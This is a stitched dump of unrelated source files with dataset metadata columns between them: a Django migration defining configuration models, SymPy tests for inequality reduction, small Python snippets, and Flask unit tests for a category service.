('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('prefix', models.CharField(max_length=4, verbose_name='Inquiry Prefix')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_parametersettings', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_parametersettings', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Parameter Setting',
'verbose_name_plural': 'Parameter Setting',
'db_table': 'parameter_settings',
},
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('language_code', models.CharField(max_length=70, unique=True)),
('language_name', models.CharField(max_length=70, unique=True, verbose_name='Language')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_languages', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_languages', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Language Configuration',
'verbose_name_plural': 'Language Configuration',
'db_table': 'language_configuration',
},
),
migrations.CreateModel(
name='CurrencyMaster',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('currency', models.CharField(max_length=30, unique=True, verbose_name='Currency Name')),
('symbol', models.CharField(max_length=30)),
('code_iso', models.CharField(blank=True, max_length=30, null=True, verbose_name='Code ISO')),
('hex_symbol', models.CharField(blank=True, max_length=30, null=True, verbose_name='Hex Code')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_currencymasters', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_currencymasters', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Currency Master',
'verbose_name_plural': 'Currency Master',
'db_table': 'currency_master',
},
),
migrations.CreateModel(
name='ContactTypesReasons',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('contact_reasons', models.CharField(max_length=100, unique=True, verbose_name='contact type Reasons')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_contacttypesreasonss', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_contacttypesreasonss', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Contact/Inquiry Type Reasons',
'verbose_name_plural': 'Contact/Inquiry Type Reasons',
'db_table': 'contact_types_reasons',
},
),
migrations.CreateModel(
name='CancellationReason',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('cancel_reason_name', models.CharField(max_length=100, verbose_name='Cancellation Reason')),
('cancel_reason_for', models.CharField(max_length=255)),
('cancel_reason_details', models.CharField(blank=True, max_length=255, null=True, verbose_name='Description')),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_cancellationreasons', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_cancellationreasons', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Cancellation Reasons',
'verbose_name_plural': 'Cancellation Reasons',
'db_table': 'cancellation_reason_configuration',
},
),
migrations.CreateModel(
name='BusinessType',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('is_active', models.BooleanField(default=True)),
('meta_title', models.CharField(blank=True, max_length=250, null=True, verbose_name='Meta Title')),
('meta_description', models.TextField(blank=True, null=True, verbose_name='Meta Description')),
('keywords', models.CharField(blank=True, max_length=250, null=True, verbose_name='Keyword')),
('business_type', models.CharField(max_length=50, unique=True)),
('description', models.CharField(blank=True, max_length=200, null=True)),
('created_by', models.ForeignKey(blank=True, db_column='created_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='created_businesstypes', to=settings.AUTH_USER_MODEL, verbose_name='Created By')),
('updated_by', models.ForeignKey(blank=True, db_column='updated_by', limit_choices_to=models.Q(('is_staff', 0), ('is_superuser', 0), _negated=True), null=True, on_delete=django.db.models.deletion.CASCADE, related_name='updated_businesstypes', to=settings.AUTH_USER_MODEL, verbose_name='Updated By')),
],
options={
'verbose_name': 'Business Type',
'verbose_name_plural': 'Business Type',
'db_table': 'business_type_manager',
'ordering': ['business_type'],
},
),
]
| 80.510526 | 323 | 0.649474 | 1,744 | 15,297 | 5.441514 | 0.081995 | 0.085775 | 0.048999 | 0.054057 | 0.803161 | 0.796733 | 0.793256 | 0.778082 | 0.751317 | 0.741201 | 0 | 0.011291 | 0.206773 | 15,297 | 189 | 324 | 80.936508 | 0.770809 | 0.002942 | 0 | 0.538462 | 1 | 0 | 0.215607 | 0.033967 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021978 | 0 | 0.043956 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5b0d3ccdaba9e0a34f03337d87911d9c03dc2423 | 9,694 | py | Python | sympy/solvers/tests/test_inequalities.py | pernici/sympy | 5e6e3b71da777f5b85b8ca2d16f33ed020cf8a41 | [
"BSD-3-Clause"
] | null | null | null | sympy/solvers/tests/test_inequalities.py | pernici/sympy | 5e6e3b71da777f5b85b8ca2d16f33ed020cf8a41 | [
"BSD-3-Clause"
] | null | null | null | sympy/solvers/tests/test_inequalities.py | pernici/sympy | 5e6e3b71da777f5b85b8ca2d16f33ed020cf8a41 | [
"BSD-3-Clause"
] | null | null | null | """Tests for tools for solving inequalities and systems of inequalities. """
from sympy.solvers.inequalities import (
reduce_poly_inequalities,
reduce_inequalities)
from sympy import (
S, Symbol, Interval, Eq, Ne, Lt, Le, Gt, Ge, Or, And, pi, oo,
sqrt, Q, Assume, global_assumptions, re, im, sin)
from sympy.utilities.pytest import raises
from sympy.abc import x, y
inf = oo.evalf()
x_assume = Assume(x, Q.real)
y_assume = Assume(y, Q.real)
def test_reduce_poly_inequalities_real_interval():
global_assumptions.add(x_assume)
global_assumptions.add(y_assume)
assert reduce_poly_inequalities([[Eq(x**2, 0)]], x, relational=False) == [Interval(0, 0)]
assert reduce_poly_inequalities([[Le(x**2, 0)]], x, relational=False) == [Interval(0, 0)]
assert reduce_poly_inequalities([[Lt(x**2, 0)]], x, relational=False) == []
assert reduce_poly_inequalities([[Ge(x**2, 0)]], x, relational=False) == [Interval(-oo, oo)]
assert reduce_poly_inequalities([[Gt(x**2, 0)]], x, relational=False) == [Interval(-oo, 0, right_open=True), Interval(0, oo, left_open=True)]
assert reduce_poly_inequalities([[Ne(x**2, 0)]], x, relational=False) == [Interval(-oo, 0, right_open=True), Interval(0, oo, left_open=True)]
assert reduce_poly_inequalities([[Eq(x**2, 1)]], x, relational=False) == [Interval(-1,-1), Interval(1, 1)]
assert reduce_poly_inequalities([[Le(x**2, 1)]], x, relational=False) == [Interval(-1, 1)]
assert reduce_poly_inequalities([[Lt(x**2, 1)]], x, relational=False) == [Interval(-1, 1, True, True)]
assert reduce_poly_inequalities([[Ge(x**2, 1)]], x, relational=False) == [Interval(-oo, -1), Interval(1, oo)]
assert reduce_poly_inequalities([[Gt(x**2, 1)]], x, relational=False) == [Interval(-oo, -1, right_open=True), Interval(1, oo, left_open=True)]
assert reduce_poly_inequalities([[Ne(x**2, 1)]], x, relational=False) == [Interval(-oo, -1, right_open=True), Interval(-1, 1, True, True), Interval(1, oo, left_open=True)]
assert reduce_poly_inequalities([[Eq(x**2, 1.0)]], x, relational=False) == [Interval(-1.0,-1.0), Interval(1.0, 1.0)]
assert reduce_poly_inequalities([[Le(x**2, 1.0)]], x, relational=False) == [Interval(-1.0, 1.0)]
assert reduce_poly_inequalities([[Lt(x**2, 1.0)]], x, relational=False) == [Interval(-1.0, 1.0, True, True)]
assert reduce_poly_inequalities([[Ge(x**2, 1.0)]], x, relational=False) == [Interval(-inf, -1.0), Interval(1.0, inf)]
assert reduce_poly_inequalities([[Gt(x**2, 1.0)]], x, relational=False) == [Interval(-inf, -1.0, right_open=True), Interval(1.0, inf, left_open=True)]
assert reduce_poly_inequalities([[Ne(x**2, 1.0)]], x, relational=False) == [Interval(-inf, -1.0, right_open=True), Interval(-1.0, 1.0, True, True), Interval(1.0, inf, left_open=True)]
s = sqrt(2)
assert reduce_poly_inequalities([[Lt(x**2 - 1, 0), Gt(x**2 - 1, 0)]], x, relational=False) == []
assert reduce_poly_inequalities([[Le(x**2 - 1, 0), Ge(x**2 - 1, 0)]], x, relational=False) == [Interval(-1,-1), Interval(1, 1)]
assert reduce_poly_inequalities([[Le(x**2 - 2, 0), Ge(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, False, False), Interval(1, s, False, False)]
assert reduce_poly_inequalities([[Le(x**2 - 2, 0), Gt(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, False, True), Interval(1, s, True, False)]
assert reduce_poly_inequalities([[Lt(x**2 - 2, 0), Ge(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, True, False), Interval(1, s, False, True)]
assert reduce_poly_inequalities([[Lt(x**2 - 2, 0), Gt(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, True, True), Interval(1, s, True, True)]
assert reduce_poly_inequalities([[Lt(x**2 - 2, 0), Ne(x**2 - 1, 0)]], x, relational=False) == [Interval(-s, -1, True, True), Interval(-1, 1, True, True), Interval(1, s, True, True)]
global_assumptions.remove(x_assume)
global_assumptions.remove(y_assume)
def test_reduce_poly_inequalities_real_relational():
global_assumptions.add(x_assume)
global_assumptions.add(y_assume)
assert reduce_poly_inequalities([[Eq(x**2, 0)]], x, relational=True) == Eq(x, 0)
assert reduce_poly_inequalities([[Le(x**2, 0)]], x, relational=True) == Eq(x, 0)
assert reduce_poly_inequalities([[Lt(x**2, 0)]], x, relational=True) == False
assert reduce_poly_inequalities([[Ge(x**2, 0)]], x, relational=True) == True
assert reduce_poly_inequalities([[Gt(x**2, 0)]], x, relational=True) == Or(Lt(x, 0), Lt(0, x))
assert reduce_poly_inequalities([[Ne(x**2, 0)]], x, relational=True) == Or(Lt(x, 0), Lt(0, x))
assert reduce_poly_inequalities([[Eq(x**2, 1)]], x, relational=True) == Or(Eq(x, -1), Eq(x, 1))
assert reduce_poly_inequalities([[Le(x**2, 1)]], x, relational=True) == And(Le(-1, x), Le(x, 1))
assert reduce_poly_inequalities([[Lt(x**2, 1)]], x, relational=True) == And(Lt(-1, x), Lt(x, 1))
assert reduce_poly_inequalities([[Ge(x**2, 1)]], x, relational=True) == Or(Le(x, -1), Le(1, x))
assert reduce_poly_inequalities([[Gt(x**2, 1)]], x, relational=True) == Or(Lt(x, -1), Lt(1, x))
assert reduce_poly_inequalities([[Ne(x**2, 1)]], x, relational=True) == Or(Lt(x, -1), And(Lt(-1, x), Lt(x, 1)), Lt(1, x))
assert reduce_poly_inequalities([[Eq(x**2, 1.0)]], x, relational=True) == Or(Eq(x, -1.0), Eq(x, 1.0))
assert reduce_poly_inequalities([[Le(x**2, 1.0)]], x, relational=True) == And(Le(-1.0, x), Le(x, 1.0))
assert reduce_poly_inequalities([[Lt(x**2, 1.0)]], x, relational=True) == And(Lt(-1.0, x), Lt(x, 1.0))
assert reduce_poly_inequalities([[Ge(x**2, 1.0)]], x, relational=True) == Or(Le(x, -1.0), Le(1.0, x))
assert reduce_poly_inequalities([[Gt(x**2, 1.0)]], x, relational=True) == Or(Lt(x, -1.0), Lt(1.0, x))
assert reduce_poly_inequalities([[Ne(x**2, 1.0)]], x, relational=True) == Or(Lt(x, -1.0), And(Lt(-1.0, x), Lt(x, 1.0)), Lt(1.0, x))
global_assumptions.remove(x_assume)
global_assumptions.remove(y_assume)
def test_reduce_poly_inequalities_complex_relational():
cond = Eq(im(x), 0)
assert reduce_poly_inequalities([[Eq(x**2, 0)]], x, relational=True) == And(Eq(re(x), 0), cond)
assert reduce_poly_inequalities([[Le(x**2, 0)]], x, relational=True) == And(Eq(re(x), 0), cond)
assert reduce_poly_inequalities([[Lt(x**2, 0)]], x, relational=True) == False
assert reduce_poly_inequalities([[Ge(x**2, 0)]], x, relational=True) == cond
assert reduce_poly_inequalities([[Gt(x**2, 0)]], x, relational=True) == And(Or(Lt(re(x), 0), Lt(0, re(x))), cond)
assert reduce_poly_inequalities([[Ne(x**2, 0)]], x, relational=True) == And(Or(Lt(re(x), 0), Lt(0, re(x))), cond)
assert reduce_poly_inequalities([[Eq(x**2, 1)]], x, relational=True) == And(Or(Eq(re(x), -1), Eq(re(x), 1)), cond)
assert reduce_poly_inequalities([[Le(x**2, 1)]], x, relational=True) == And(And(Le(-1, re(x)), Le(re(x), 1)), cond)
assert reduce_poly_inequalities([[Lt(x**2, 1)]], x, relational=True) == And(And(Lt(-1, re(x)), Lt(re(x), 1)), cond)
assert reduce_poly_inequalities([[Ge(x**2, 1)]], x, relational=True) == And(Or(Le(re(x), -1), Le(1, re(x))), cond)
assert reduce_poly_inequalities([[Gt(x**2, 1)]], x, relational=True) == And(Or(Lt(re(x), -1), Lt(1, re(x))), cond)
assert reduce_poly_inequalities([[Ne(x**2, 1)]], x, relational=True) == And(Or(Lt(re(x), -1), And(Lt(-1, re(x)), Lt(re(x), 1)), Lt(1, re(x))), cond)
assert reduce_poly_inequalities([[Eq(x**2, 1.0)]], x, relational=True) == And(Or(Eq(re(x), -1.0), Eq(re(x), 1.0)), cond)
assert reduce_poly_inequalities([[Le(x**2, 1.0)]], x, relational=True) == And(And(Le(-1.0, re(x)), Le(re(x), 1.0)), cond)
assert reduce_poly_inequalities([[Lt(x**2, 1.0)]], x, relational=True) == And(And(Lt(-1.0, re(x)), Lt(re(x), 1.0)), cond)
assert reduce_poly_inequalities([[Ge(x**2, 1.0)]], x, relational=True) == And(Or(Le(re(x), -1.0), Le(1.0, re(x))), cond)
assert reduce_poly_inequalities([[Gt(x**2, 1.0)]], x, relational=True) == And(Or(Lt(re(x), -1.0), Lt(1.0, re(x))), cond)
assert reduce_poly_inequalities([[Ne(x**2, 1.0)]], x, relational=True) == And(Or(Lt(re(x), -1.0), And(Lt(-1.0, re(x)), Lt(re(x), 1.0)), Lt(1.0, re(x))), cond)
def test_reduce_abs_inequalities():
real = Assume(x, Q.real)
assert reduce_inequalities(abs(x - 5) < 3, assume=real) == And(Gt(x, 2), Lt(x, 8))
assert reduce_inequalities(abs(2*x + 3) >= 8, assume=real) == Or(Le(x, -S(11)/2), Ge(x, S(5)/2))
assert reduce_inequalities(abs(x - 4) + abs(3*x - 5) < 7, assume=real) == And(Gt(x, S(1)/2), Lt(x, 4))
assert reduce_inequalities(abs(x - 4) + abs(3*abs(x) - 5) < 7, assume=real) == Or(And(-2 < x, x < -1), And(S(1)/2 < x, x < 4))
raises(NotImplementedError, "reduce_inequalities(abs(x - 5) < 3)")
def test_reduce_inequalities_boolean():
assert reduce_inequalities([Eq(x**2, 0), True]) == And(Eq(re(x), 0), Eq(im(x), 0))
assert reduce_inequalities([Eq(x**2, 0), False]) == False
def test_reduce_inequalities_assume():
assert reduce_inequalities([Le(x**2, 1), Assume(x, Q.real)]) == And(Le(-1, x), Le(x, 1))
assert reduce_inequalities([Le(x**2, 1)], Assume(x, Q.real)) == And(Le(-1, x), Le(x, 1))
def test_reduce_inequalities_multivariate():
assert reduce_inequalities([Ge(x**2, 1), Ge(y**2, 1)]) == \
And(And(Or(Le(re(x), -1), Le(1, re(x))), Eq(im(x), 0)),
And(Or(Le(re(y), -1), Le(1, re(y))), Eq(im(y), 0)))
def test_reduce_inequalities_errors():
raises(NotImplementedError, "reduce_inequalities(Ge(sin(x) + x, 1))")
raises(NotImplementedError, "reduce_inequalities(Ge(x**2*y + y, 1))")
raises(NotImplementedError, "reduce_inequalities(Ge(sqrt(2)*x, 1))")
| 71.279412 | 187 | 0.630493 | 1,667 | 9,694 | 3.547091 | 0.041992 | 0.025368 | 0.24184 | 0.288855 | 0.87333 | 0.840859 | 0.800947 | 0.782513 | 0.751057 | 0.694233 | 0 | 0.047443 | 0.136786 | 9,694 | 135 | 188 | 71.807407 | 0.659178 | 0.007118 | 0 | 0.09434 | 0 | 0 | 0.015388 | 0.012061 | 0 | 0 | 0 | 0 | 0.660377 | 1 | 0.075472 | false | 0 | 0.037736 | 0 | 0.113208 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
960816f8d6cd6de831155055f5b68fcab126ccc7 | 39 | py | Python | api_token.py | image-store-org/image-store-py-web-api-consumer | 8d1f20a804172a4315f9d43e88beb0751f425dbd | [
"MIT"
] | null | null | null | api_token.py | image-store-org/image-store-py-web-api-consumer | 8d1f20a804172a4315f9d43e88beb0751f425dbd | [
"MIT"
] | 1 | 2021-01-12T22:50:20.000Z | 2021-01-18T18:20:24.000Z | api_token.py | image-store-org/image-store-py-web-api-consumer | 8d1f20a804172a4315f9d43e88beb0751f425dbd | [
"MIT"
] | null | null | null | def get_token():
return 'API_TOKEN' | 19.5 | 22 | 0.692308 | 6 | 39 | 4.166667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 39 | 2 | 22 | 19.5 | 0.78125 | 0 | 0 | 0 | 0 | 0 | 0.225 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
8254f835425587d867eae4b839f44aac440c8e9e | 118 | py | Python | os/example_fsencode.py | Carglglz/micropython-lib | 07102c56aa1087b97ee313cedc1d89fd20452e11 | [
"PSF-2.0"
] | 1,556 | 2015-01-18T01:10:21.000Z | 2022-03-31T23:27:33.000Z | unix-ffi/os/example_fsencode.py | Li-Lian1069/micropython-lib | 1dfca5ad343b2841965df6c4e59f92d6d94a24bd | [
"PSF-2.0"
] | 414 | 2015-01-01T09:01:22.000Z | 2022-03-31T15:08:24.000Z | unix-ffi/os/example_fsencode.py | Li-Lian1069/micropython-lib | 1dfca5ad343b2841965df6c4e59f92d6d94a24bd | [
"PSF-2.0"
] | 859 | 2015-02-05T13:23:00.000Z | 2022-03-28T02:28:16.000Z | import os
print(os.fsencode("abc"))
print(os.fsencode(b"abc"))
print(os.fsdecode("abc"))
print(os.fsdecode(b"abc"))
| 14.75 | 26 | 0.694915 | 20 | 118 | 4.1 | 0.35 | 0.341463 | 0.365854 | 0.439024 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.067797 | 118 | 7 | 27 | 16.857143 | 0.745455 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0.8 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
825bfccff909ccf58aa93a45c175eff00624143b | 21,479 | py | Python | unit_tests/dependencies/maintain_api/test_categories.py | LandRegistry/maintain-frontend | d92446a9972ebbcd9a43a7a7444a528aa2f30bf7 | [
"MIT"
] | 1 | 2019-10-03T13:58:29.000Z | 2019-10-03T13:58:29.000Z | unit_tests/dependencies/maintain_api/test_categories.py | LandRegistry/maintain-frontend | d92446a9972ebbcd9a43a7a7444a528aa2f30bf7 | [
"MIT"
] | null | null | null | unit_tests/dependencies/maintain_api/test_categories.py | LandRegistry/maintain-frontend | d92446a9972ebbcd9a43a7a7444a528aa2f30bf7 | [
"MIT"
] | 1 | 2021-04-11T05:24:57.000Z | 2021-04-11T05:24:57.000Z | from unittest import TestCase
from unittest.mock import patch, MagicMock
from flask import g
from maintain_frontend import main
from maintain_frontend.dependencies.maintain_api.categories import CategoryService
from maintain_frontend.exceptions import ApplicationError
from unit_tests.utilities import Utilities
class TestCategories(TestCase):
def setUp(self):
self.app = main.app.test_client()
Utilities.mock_session_cookie_unittest(self)
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = [
{
"permission": None,
"display-name": "Test 1",
"name": "test-1"
},
{
"permission": None,
"display-name": "Test 2",
"name": "test-2"
}
]
g.requests.get.return_value = response
response = CategoryService.get_categories()
self.assertEqual(2, len(response))
self.assertEqual("test-1", response[0]['name'])
self.assertEqual("Test 1", response[0]['display'])
self.assertEqual("test-2", response[1]['name'])
self.assertEqual("Test 2", response[1]['display'])
g.requests.get.assert_called_with("{}/categories".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level_filtered_permissions(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = []
response = MagicMock()
response.status_code = 200
response.json.return_value = [
{
"permission": "TEST-PERMISSION",
"display-name": "Test 1",
"name": "test-1"
},
{
"permission": None,
"display-name": "Test 2",
"name": "test-2"
}
]
g.requests.get.return_value = response
response = CategoryService.get_categories()
self.assertEqual(1, len(response))
self.assertEqual("test-2", response[0]['name'])
self.assertEqual("Test 2", response[0]['display'])
g.requests.get.assert_called_with("{}/categories".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level_permissions(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = ["TEST-PERMISSION"]
response = MagicMock()
response.status_code = 200
response.json.return_value = [
{
"permission": "TEST-PERMISSION",
"display-name": "Test 1",
"name": "test-1"
},
{
"permission": None,
"display-name": "Test 2",
"name": "test-2"
}
]
g.requests.get.return_value = response
response = CategoryService.get_categories()
self.assertEqual(2, len(response))
self.assertEqual("test-1", response[0]['name'])
self.assertEqual("Test 1", response[0]['display'])
self.assertEqual("test-2", response[1]['name'])
self.assertEqual("Test 2", response[1]['display'])
g.requests.get.assert_called_with("{}/categories".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_top_level_error(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 500
g.requests.get.return_value = response
self.assertRaises(ApplicationError, CategoryService.get_categories)
g.requests.get.assert_called_with("{}/categories".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": None}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_category_parent_info("test")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(1, len(category.sub_categories))
self.assertEqual("sub name", category.sub_categories[0].name)
self.assertEqual("sub display", category.sub_categories[0].display_name)
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info_permission_filtered(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = []
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": None,
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "abc"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_category_parent_info("test")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
self.assertEqual("Test 1", category.display_name)
self.assertEqual(0, len(category.sub_categories))
self.assertEqual(1, len(category.statutory_provisions))
self.assertEqual("test stat prov", category.statutory_provisions[0])
self.assertEqual(1, len(category.instruments))
self.assertEqual("test instrument", category.instruments[0])
self.assertIsNone(category.parent)
g.requests.get.assert_called_with("{}/categories/test".format('abc'))
mock_current_app.logger.info.assert_called()
@patch('maintain_frontend.dependencies.maintain_api.categories.MAINTAIN_API_URL', 'abc')
@patch('maintain_frontend.dependencies.maintain_api.categories.current_app')
def test_get_category_info_permission(self, mock_current_app):
with main.app.test_request_context():
g.requests = MagicMock()
g.session = MagicMock()
g.session.user.permissions = ["parent-permission", "sub-permission"]
response = MagicMock()
response.status_code = 200
response.json.return_value = {
"permission": "parent-permission",
"display-name": "Test 1",
"name": "test-1",
"sub-categories": [
{"name": "sub name",
"display-name": "sub display",
"permission": "sub-permission"}
],
"statutory-provisions": [
"test stat prov"
],
"instruments": [
"test instrument"
],
"parent": None}
g.requests.get.return_value = response
category = CategoryService.get_category_parent_info("test")
self.assertIsNotNone(category)
self.assertEqual("test-1", category.name)
